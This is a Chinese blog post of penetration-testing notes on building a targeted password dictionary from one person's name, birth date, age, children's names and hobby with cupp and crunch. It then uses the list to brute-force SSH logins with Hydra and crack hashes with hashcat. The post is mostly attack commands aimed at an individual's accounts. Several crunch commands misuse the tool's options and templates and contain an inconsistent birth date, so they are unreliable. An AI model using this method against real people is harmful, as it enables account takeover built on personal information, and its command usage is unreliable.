从信息收集到构建密码字典

cupp

1	`git clone https://github.com/Mebus/cupp.git`

根据以下信息的生日、孩子名字、名字生成密码字典，涵盖年龄、名字缩写、组合、常见单词、leet

name: Michael age: 27 birth date: 19/10/1996 number of children: 3 “ Ahmed - Yasser - Adam “ Hobbies: swimming

1 2	`# 生成包含姓名、生日、年龄、孩子名的基础组合，长度 4-16 crunch 4 16 -t Michael%%,%19101996%,%%27,%Ahmed%,%Yasser%,%Adam%,%swim% -o michael_base.txt`

参数说明：
- 4 16：密码长度范围 4-16 位
- -t：指定模板，% 代表数字占位符（可替换为生日 / 年龄）
- -o：输出到指定文件

Leet 替换需要自定义字符集，创建 leet_charset.txt 文件，写入常用 Leet 映射：

a@4
b8
e3
i!1
l1
o0
s$5

然后执行命令生成 Leet 组合字典：

1 2	`# 生成 Leet 变体 + 个人信息组合 crunch 4 18 -f leet_charset.txt l33t -t M@ch3l%%,%10191996%,%L0v3%,%4hm3d%,%5w!m% -o michael_leet.txt`

结合姓名缩写 + 生日 + 常见单词等组合模式，直接编写规则文件 michael_rule.rule：

# 规则格式：[前缀][中缀][后缀]
Michael1910
mike27
AYA1996
swimfamily
Adam27love
M1ch43l1019
4hm3d5w!m

然后用 crunch 读取规则文件：

1	`crunch 5 20 -r michael_rule.rule -o michael_final.txt`

Hydra（远程服务爆破）：

1	`hydra -l 目标用户名 -P michael_final.txt ssh://目标IP`

Hashcat（哈希破解）：

1	`hashcat -m 0 -a 0 目标哈希值 michael_final.txt`

技术备忘 > 渗透

#渗透 #密码爆破

从信息收集到构建密码字典

https://blog.zhaosn.top/2025/cipherDict/

作者

Zhao SN

发布于

2025年12月31日

更新于

2025年12月31日

许可协议